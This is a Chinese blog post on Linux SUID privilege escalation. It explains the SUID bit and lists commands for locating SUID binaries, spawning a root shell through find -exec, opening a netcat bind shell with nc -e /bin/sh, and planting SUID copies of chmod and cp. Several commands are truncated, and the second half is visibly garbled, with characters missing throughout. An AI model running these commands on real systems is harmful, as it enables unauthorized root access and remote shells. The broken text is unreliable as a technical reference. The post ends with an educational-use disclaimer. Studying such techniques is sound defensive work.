suid提权全解(超细)

SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

查找suid文件

find / -perm -u=s -type f 2>/dev/null
/表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)

表示重定向
/ dev / null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。

利用方式:

find命令

sudo find . -exec /bin/sh \; -quit
  
进行反弹shell也可以
find dirty -exec nc -lvp 9999 -e /bin/sh ;

chmod命令

sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod

ash,linux shell

sudo ash

cp命令

sudo sh -c 'cp $(which cp) .; chmod +s

### SUID方法 当文件设置了SUID位之后,任何运行该程序的用户都会暂时获得拥有者限。这可以被利用来进行操作。为了设置或移除SUID位,可使用`chmod`命令: ```bash chmod u+s filename # 设置SUID位 chmod u-s filename # 移除SUID位 ``` 一旦某个二进制文件具有了SUID限,攻击者可以通过执行此文件来获取更高的限[^2]。 #### 利用SUID进行的具体实例 假设存在一个带有SUID标志的应用程序允许用户修改其行为或参数,则可能成为潜在的安全风险点。例如,如果`/usr/bin/cp`这样的常用工具意外地获得了SUID属性,那么就可以创建恶意脚本并将其复制到受信任的位置从而实现非法访问控制升[^3]。 具体来说,下面是一个不安全的操作案例展示如何滥用这种机制完成过程: ```bash sudo sh -c 'cp $(which cp) .; chmod +s ./cp' ``` 这段代码的作用是从系统的路径中找到真正的`cp`命令位置,并将其副本放置于当前工作目录下;接着赋予新拷贝后的`cp`命令以SUID限。这意味着现在任何人都能以root的身份执行这个本地版本的`cp`指令。 ### CP技巧 对于CP(即copy命令),通常情况下它并不具备直接导致的能力。但是,在某些特殊场景里——比如上述到的情况或是其他形式误配置的情况下——它可以作为辅助手段参与到更复杂的攻击链路之中。特别是当管理员错误地授予了像`cp`这类基本实用程序额外特时,就有可能让普通用户绕过正常的安全限制而达到目的。 需要注意的是,以上描述仅用于教育和技术交流用途,请勿尝试在未经授许可的前下实施此类行动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值